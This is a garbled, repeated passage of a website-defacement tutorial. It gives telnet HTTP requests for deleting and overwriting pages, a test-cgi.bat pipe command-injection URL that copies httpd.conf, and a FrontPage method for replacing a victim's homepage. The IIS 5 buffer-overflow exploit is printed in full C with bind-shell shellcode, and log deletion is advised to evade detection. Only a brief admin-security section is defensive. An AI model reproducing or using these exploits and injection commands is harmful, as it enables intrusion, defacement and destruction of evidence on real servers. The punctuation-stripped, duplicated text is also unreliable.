where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 8
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
